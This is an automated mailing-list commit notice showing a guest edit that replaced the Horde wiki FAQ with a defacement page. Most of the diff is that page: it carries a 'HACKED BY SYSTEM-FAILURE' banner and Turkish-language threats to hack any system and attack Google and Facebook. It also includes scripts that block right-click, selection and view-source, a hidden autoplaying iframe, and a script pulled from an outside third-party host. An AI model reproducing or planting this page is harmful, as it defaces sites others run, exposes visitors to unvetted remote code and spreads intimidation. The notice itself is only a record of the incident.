[commits] [Wiki] changed: FAQ
Wiki Guest
wikiguest at horde.org
Sun Feb 11 11:38:19 UTC 2018
guest [178.241.73.203] Sun, 11 Feb 2018 11:38:19 +0000
Modified page: https://wiki.horde.org/FAQ
New Revision: 7
Change log: index.php
@@ -1,37 +1,263 @@
-+ Frequently Asked Questions
+<html lang="tr"><head><meta http-equiv="Content-Type"
content="text/html;charset=UTF-8">
+<link rel="icon" type="image/gif"
href="https://dl.dropbox.com/s/y4wak89bcfrm2j9/AYT.ico">
+
+
+ <meta name="apple-mobile-web-app-capable" content="yes">
+ <meta name="viewport" content="width=device-width,
initial-scale=1, maximum-scale=1, user-scalable=no">
+ <meta charset="utf-8">
+
+ <!-- PAGE TITLE -->
+ <title>| HACKED BY ER SYSTEM-FAILURE |</title> <!-- PAGE TITLE -->
+
+<script language="Javascript">var msg1 = "| HACKED BY ER
SYSTEM-FAILURE |";var speed=50;function ScrollTitle()
{document.title=msg1;msg1=msg1.substring(1,msg1.length)+msg1.charAt(0);setTimeout("ScrollTitle()",speed);}ScrollTitle();</script>
+<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
+
+ <!-- GOOGLE FONTS -->
+ <link
href="http://fonts.googleapis.com/css?family=Lato:300,400,700|Raleway:300,400,500|Open+Sans:300,400,600,700,800" rel="stylesheet"
type="text/css">
+
+ <!-- STYLESHEETS -->
+ <link
href="https://dl.dropboxusercontent.com/s/ba24iz7jtpd914d/bootstrap.min.css"
rel="stylesheet" type="text/css">
+ <link
href="https://dl.dropboxusercontent.com/s/oxuvsvzdx3ths53/font-awesome.min.css" rel="stylesheet"
type="text/css">
+ <link
href="https://dl.dropboxusercontent.com/s/d9wc0g9em7a7fsp/animate.min.css"
rel="stylesheet" type="text/css">
+ <link
href="https://dl.dropboxusercontent.com/s/hqh925rqs6ywabf/style.css"
rel="stylesheet" type="text/css">
-##red|Some parts of these FAQs are not up-to-date with the latest
release versions, but most answers and questions still apply to the
currently stable application versions. You should also check the
((HowTo|Horde How To Page)) for information involving the latest
release versions.##
+<script language="JavaScript">
+ document.onkeypress = function (event) {
+ event = (event || window.event);
+ if (event.keyCode == 123) {
+ return false;
+ }
+ }
+ document.onmousedown = function (event) {
+ event = (event || window.event);
+ if (event.keyCode == 123) {
+ return false;
+ }
+ }
+document.onkeydown = function (event) {
+ event = (event || window.event);
+ if (event.keyCode == 123) {
+ return false;
+ }
+ }
+</script>
+</head><body oncontextmenu="return false" onselectstart="return
false" ondragstart="return false" class="extended" style="position:
relative; transform: translate3d(0px, 0px, 0px); transform-style:
preserve-3d; backface-visibility: hidden;"> <script
language="JavaScript1.2">
+function disableselect(e){
+return false
+}
+function reEnable(){
+return true
+}
+//if IE4+/SYSTEM-FAILURE
+document.onselectstart=new Function ("return false")
+//if NS6
+if (window.sidebar){
+document.onmousedown=disableselect
+document.onclick=reEnable
+}
+</script>
+
+
+
+ <!-- BACKGROUND -->
+ <div id="bg-pattern"></div>
+ <div id="bg-darker"></div>
+ <div id="bg-image" style="position: fixed; z-index: -1;
background: none; transform: scale(1.06);"><div class="backstretch
layer" data-depth="0.1" style="left: 0px; top: 0px; overflow: hidden;
margin: 0px; padding: 0px; height: 759px; width: 982px; z-index:
-999998; position: relative; display: block; transform:
translate3d(-24.3401px, 5.71651px, 0px); transform-style: preserve-3d;
backface-visibility: hidden;"><img
src="https://resmim.net/f/nbknqt.jpg" style="position: absolute;
margin: 0px; padding: 0px; border: none; width: 1349.33px; height:
759px; max-height: none; max-width: none; z-index: -999999; left:
-183.667px; top: 0px;"></div></div>
+ <!-- /BACKGROUND -->
+
+
+
+ <!-- PRELOADER -->
+ <div id="prelaoder" class="animated fadeOut" style="display: none;">
+ <div class="socket animated fadeOut">
+ <img src="https://i.hizliresim.com/jWWgEG.png">
+ </div>
+ </div>
+ <!-- /PRELOADER -->
+
+
+ <!-- FRONT CONTENT -->
+ <div id="front-page">
+
+ <div id="canvas-container" class="animated fadeInUp"
style="opacity: 1;">
+ <canvas id="gravity" class="layer" data-depth="0.50"
width="982" height="759" style="position: absolute; display: block;
left: 0px; top: 0px; transform: translate3d(-121.7px, 28.5825px, 0px);
transform-style: preserve-3d; backface-visibility: hidden;"></canvas>
+ </div>
+
+ <!-- HOME SCREEN -->
+ <div id="home-screen" class="layer" data-depth="0.05"
style="position: absolute; display: block; left: 0px; top: 0px;
transform: translate3d(-12.17px, 2.85825px, 0px); transform-style:
preserve-3d; backface-visibility: hidden;">
-Welcome to the Frequently-Asked Questions list of the
[http://www.horde.org/ Horde Project]. The FAQ is divided into three
sections. First section addresses questions frequently asked by
systems administrators regarding the installation, configuration, and
day-to-day operation of Horde and its components. The second section
addresses the questions that are regularly asked by users of Horde.
And the third section addresses questions rised by Horde developers.
-
-
-
-Comments on the FAQ, and suggestions for additions (preferably with
answers!) are [http://www.horde.org/mailto.php/faq welcome]. If you
have a question about how to install, configure, run, or use Horde or
any of its components. please send it to the appropriate
[http://www.horde.org/mail/ mailing list].
-
-
-
-++ ((FAQ/User|User's FAQ))
-
-
-
-The Horde User's FAQ contains questions and answers regarding using
Horde and its components. If you are //not// the system administrator
for your Horde installation, this is probably the FAQ you want.
-
-
-
-++ ((FAQ/Admin|Administrator's FAQ))
-
-
-
-The Horde Administrator's FAQ contains questions and answers
regarding obtaining, installing, configuring, and running Horde and
its components. If you are not the system administrator for your Horde
installation, then you probably want the User's FAQ, above.
-
+
+ <!-- CONTENT BLOCK -->
+<div class="content-block animated">
+<div class="container animated">
+<img class="logo animated fadeInDown"
src="https://i.hizliresim.com/lO35Jk.jpg" style="opacity: 1;">
+
+<div class="slider" style="position: relative; overflow:
hidden;"><div class="slide cycle-slide cycle-sentinel"
style="position: static; top: 0px; left: 0px; z-index: 100; opacity:
1; display: block; visibility: hidden;"> <h1 class="animated fadeInUp"
style="visibility: hidden; opacity: 1;">HELLO ADM?N <span
style="visibility: hidden;"><span style="visibility: hidden;"> <br
style="visibility: hidden;"> SYSTEM HACKED !..;)<br style="visibility:
hidden;"> </span></span></h1> </div>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ <div class="slide cycle-slide" style="position:
absolute; top: 138px; left: 0px; z-index: 99; opacity: 1; display:
block; visibility: hidden;"> <h1 class="animated fadeInUp"
style="opacity: 1;">HI ADMIN <span><span> <br> SYSTEM HACKED)<br>
</span></span></h1> </div><div class="slide cycle-slide
cycle-slide-active" style="position: absolute; top: 0px; left: 0px;
z-index: 98; visibility: visible; opacity: 1; display: block;"> <h1
class="animated fadeInUp" style="opacity: 1;">HERKEZ HADDINI BILSIN !
ALT YAPINIZI COKERTIRIM<span><span><br> HEPINIZE SIRA GELICEK
</span></span></h1> </div><div class="slide cycle-slide"
style="position: absolute; top: 0px; left: 0px; z-index: 97;
visibility: hidden;"> <h1 class="animated fadeInUp" style="opacity:
1;"><br><span><span><br><span></span></span></span></h1></div><div
class="slide cycle-slide" style="position: absolute; top: 0px; left:
0px; z-index: 96; visibility: hidden;"> <h1 class="animated fadeInUp"
style="opacity: 1;"><span>GIrd?g?m HER S?STEM?<br></span> KIM OLURSA
Olsun'kI HACK LIYECEGIME YEMIN EDERIM<span><br><span>
</span></span></h1> </div><div class="slide cycle-slide"
style="position: absolute; top: 0px; left: 0px; z-index: 95;
visibility: hidden;"> <h1 class="animated fadeInUp" style="opacity:
1;">TEK VATAN <span><br>TEK MILLET<span></span></span></h1> </div><div
class="slide cycle-slide" style="position: absolute; top: 0px; left:
0px; z-index: 94; visibility: hidden;"> <h1 class="animated fadeInUp"
style="opacity: 1;"><span><br><span></span></span></h1></div><div
class="slide cycle-slide" style="position: absolute; top: 0px; left:
0px; z-index: 93; visibility: hidden;"> <h1 class="animated fadeInUp"
style="opacity: 1;"><span><br><span> </span></span></h1> </div><div
class="slide cycle-slide" style="position: absolute; top: 0px; left:
0px; z-index: 92; visibility: hidden;"> <h1 class="animated fadeInUp"
style="opacity: 1;">YOU WERE HACKED
BY<span><span><br>SYSTEM-FAILURE</span></span></h1> </div><div
class="slide cycle-slide" style="position: absolute; top: 0px; left:
0px; z-index: 91; visibility: hidden;"> <h1 class="animated fadeInUp"
style="opacity: 1;">SESSIZ'LI?IMIZI SIMDIDEN FIRSAT BILIN BIRGUN
GELICEZ<span><span> <br>SISTEMLERI KAPATMAK BORCUMUZ OLSUN<br>
</span></span></h1> </div><div class="slide cycle-slide"
style="position: absolute; top: 0px; left: 0px; z-index: 90;
visibility: hidden;"> <h1 class="animated fadeInUp" style="opacity:
1;">BIZIM ADIMIZ YOK<span>TEK KORKUMUZ ALLAH'TIR.<br>BIZIM ALLAH'TAN
BA?KA KIMSEDEN KORKUMUZ YOKTUR</span>NE OLURSA OLSUN YAPTIKLARIMIZA
KARSI CIKAN OLURSA HADDINI BILDIRIRIZ<span></span></h1> </div><div
class="slide cycle-slide" style="position: absolute; top: 0px; left:
0px; z-index: 89; visibility: hidden;"> <h1 class="animated fadeInUp"
style="opacity: 1;">SYSTEM-FAILURE ORDUSU TARAFINDAN HACKLENDINIZ
<span><span><br></span></span></h1> </div><div class="slide
cycle-slide" style="position: absolute; top: 0px; left: 0px; z-index:
88; visibility: hidden;"> <h1 class="animated fadeInUp"
style="opacity: 1;">BIZIMLE DOST OL DUSMAN OLMA TERCIH
SENIN<span><span> <br>DUSMANIMIZ OLURSAN TEPENE
BINERIZ.<br></span></span></h1> </div><div class="slide cycle-slide"
style="position: absolute; top: 0px; left: 0px; z-index: 87;
visibility: hidden;"> <h1 class="animated fadeInUp" style="opacity:
1;"><br><span></span><span></span></h1> </div><div class="slide
cycle-slide" style="position: absolute; top: 0px; left: 0px; z-index:
86; visibility: hidden;"> <h1 class="animated fadeInUp"
style="opacity: 1;">BUYUK HEDEFIMIZ
GOOGLE,FACEBOOK'TUR.<span><br>HADDINI B?LMEYENE<span>HADDINI
BILDIRIRIZ</span></span></h1> </div><div class="slide cycle-slide"
style="position: absolute; top: 0px; left: 0px; z-index: 85;
visibility: hidden;"> <h1 class="animated fadeInUp" style="opacity:
1;"><span> B?Z TURK'UZ </span> <br> NE MUTLU TURK'UM
DIYENE<br><span></span> </h1> </div></div>
+
+<font size="2" face="Arial"><p class="animated fadeInUp"
style="opacity: 1;"><strong><br><br>
+ | HACKED BY SYSTEM-FAILURE |
+<font size="2" face="Arial"></font></strong></p><p class="animated
fadeInUp" style="opacity: 1;"><strong><font size="2"
face="Arial"><strong><br><br>
+|<br><br>
+ </strong></font></strong></p><strong><font size="2" face="Arial">
+
-++ ((FAQ/Developer|Developer's FAQ))
+ <font size="3" face="Arial"><p class="animated fadeInUp"
style="opacity: 1;"><strong><br><br></strong></p>
+
+ <!-- OPEN OVERLAY -->
+ <div class="arrow-wrap animated fadeInUp"
style="opacity: 1;"> <div class="open-overlay"> <i class="fa
fa-bars"></i> </div> </div>
+ <!-- /OPEN OVERLAY -->
+
+ </font></font></strong></font></div><font size="2"
face="Arial"><strong><font size="2" face="Arial"><font size="3"
face="Arial">
+
+ </font></font></strong></font></div><font size="2"
face="Arial"><strong><font size="2" face="Arial"><font size="3"
face="Arial">
+ <!-- /CONTENT BLOCK -->
+
+ </font></font></strong></font></div><font size="2"
face="Arial"><strong><font size="2" face="Arial"><font size="3"
face="Arial">
+ <!-- /HOME SCREEN -->
+
+ </font></font></strong></font></div><font size="2"
face="Arial"><strong><font size="2" face="Arial"><font size="3"
face="Arial">
+ <!-- /FRONT CONTENT -->
+
+
+
+
+ <!-- OVERLAY -->
+ <div class="overlay">
+
+
+ <!-- OVERLAY CONTAINER -->
+ <div class="overlay-container animated">
+
+ <!-- OVERLAY CONTENT -->
+ <div class="overlay-content">
+
+ <div class="container animated">
+
+ <p>
+ <br><br>
+ GIRDIGIMIZ HER TURLU SISTEMI HACK
LIYECEGIMIZE YEMIN EDERIZ.
+ KIM OLURSA OLSUN BIZIM ICIN FARK ETMEZ.
+ <br><br>
+
+ </p>
+ <div class="status-message"></div>
+
+
+ <ul class="social-icons">
+
+ <li><a data-placement="bottom" title=""
class="fa fa-facebook"
href="https://www.facebook.com/ayyildiztim2023/?fref=ts"
data-original-title="Facebook"></a></li>
+ <li><a data-placement="bottom" title=""
class="fa fa-twitter" href="https://twitter.com/AyyildizOrg2023"
data-original-title="Twitter"> </a></li>
+ <li><a data-placement="bottom" title=""
class="fa fa-envelope" href="http://www.ayyildiz.org/"
data-original-title="Contact"></a></li>
+
+ </ul>
+
+ </div>
+
+ </div>
+ <!-- /OVERLAY CONTENT -->
+
+ </div>
+ <!-- /OVERLAY CONTAINER -->
+
+ <!-- CLOSE OVERLAY -->
+ <div class="close-overlay animated"><img
class="img-responsive"
src="https://dl.dropboxusercontent.com/s/9ilh2v2bhdjrkni/cross-icon.png"></div>
+ <!-- /CLOSE OVERLAY -->
+
+ </div>
+ <!-- /OVERLAY -->
+
+ <!-- JAVASCRIPTS -->
+ <script type="text/javascript"
src="https://dl.dropboxusercontent.com/s/vu2qmpcj94v40my/jquery.min.js"></script>
+ <script type="text/javascript"
src="https://dl.dropboxusercontent.com/s/b6xpqabiq8zjf9j/bootstrap.min.js"></script>
+ <script type="text/javascript"
src="https://dl.dropboxusercontent.com/s/h0u5x9uelu9bnzp/jquery.cycle.min.js"></script>
+ <script type="text/javascript"
src="https://dl.dropboxusercontent.com/s/vunlv368z9nvnxn/jquery.parallax.min.js"></script>
+ <script type="text/javascript"
src="https://dl.dropboxusercontent.com/s/qmbb4f1yecbhbds/jquery.backstretch.min.js"></script>
+ <script type="text/javascript"
src="http://yourjavascript.com/53201111538/dengizer.js"></script>
+
+
+<script type="text/javascript">
+ //<![CDATA[
+shortcut={all_shortcuts:{},add:function(a,b,c){var
d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://www.youtube.com/c/Ayy%C4%B1ld%C4%B1zTimWgt2002"}); //WGT EK?B?//?NDEX KOD'LARINI
KULLANMAYIN\\
+//]]>
+ </script>
+
+ <script language="javascript" type="text/javascript">
+ //////// SYSTEM-FAILURE ////////
+ //INDEX, KULLANIMI YASAKTIR.
+//KODLARIMIZI KULLANMAYIN KENDINIZ KOD'LAYIN
+//BASKAN SYSTEM-FAILURE
+ function jSelectShortcode(text) {
+ jQuery("#yt_shorcodes").removeClass("open");
+ text = text.replace(/'/g, '"');
+ if(document.getElementById('jform_articletext') != null) {
+ jInsertEditorText(text, 'jform_articletext');
+ }
+ if(document.getElementById('text') != null) {
+ jInsertEditorText(text, 'text');
+ }
+ if(document.getElementById('jform_description') != null) {
+ jInsertEditorText(text, 'jform_description');
+ }
+ if(document.getElementById('jform_content') != null) {
+ jInsertEditorText(text, 'jform_content');
+ }
+ if(document.getElementById('product_desc') != null) {
+ jInsertEditorText(text, 'product_desc');
+ }
+ SqueezeBox.close();
+ }
+ </script>
+ <script type="text/javascript">
+<!--
+// ************************************************
+// // *
+// ************************************************
+// **************************************************************
+// ///*
+// **************************************************************
+function IE(e) {
+ if (navigator.appName == "Microsoft Internet Explorer" &&
(event.button == "2" || event.button == "3")) {
+ alert('UYARI, AYYILDIZ TIM WEB GRAFIK TASARIM EKIBI/M??');
+ return false;
+ }
+}
+function NS(e) {
+ if (document.layers || (document.getElementById && !document.all)) {
+ if (e.which == "2" || e.which == "3") alert('UYARI,
AYYILDIZ TIM WEB GRAFIK TASARIM EKIBI/M??'); {
+ alert('?ndex? kopyalamak, duzenlemek, ?z?ns?z
kullanmak, da??tmak yasakt?r!. Kullan?m hakk? sadece SYSTEM-FAILURE
bIrImlerIne a?tt?r. Anlay???n?z ?c?n tesekkur eder?z, SYSTEM-FAILURE);
+ return false;
+ }
+ }
+}
+document.onmousedown=IE;document.onmouseup=NS;document.oncontextmenu=new
Function("return false");
+//-->
+</script>
+
+ <iframe width="0" height="0"
src="https://www.youtube-nocookie.com/embed/4tm_9u90WCU?rel=0&autoplay=1 "
frameborder="0" allowfullscreen=""></iframe>
+
-The Horde Developer's FAQ is where to find information on working
with Horde. This may include creating custom or proprietary Horde
modules or contributing to the open source Horde community. This
information is only for people who are interested in working with the
internals of Horde or the Framework libraries.
+</font></font></strong></font></body></html>
More information about the commits
mailing list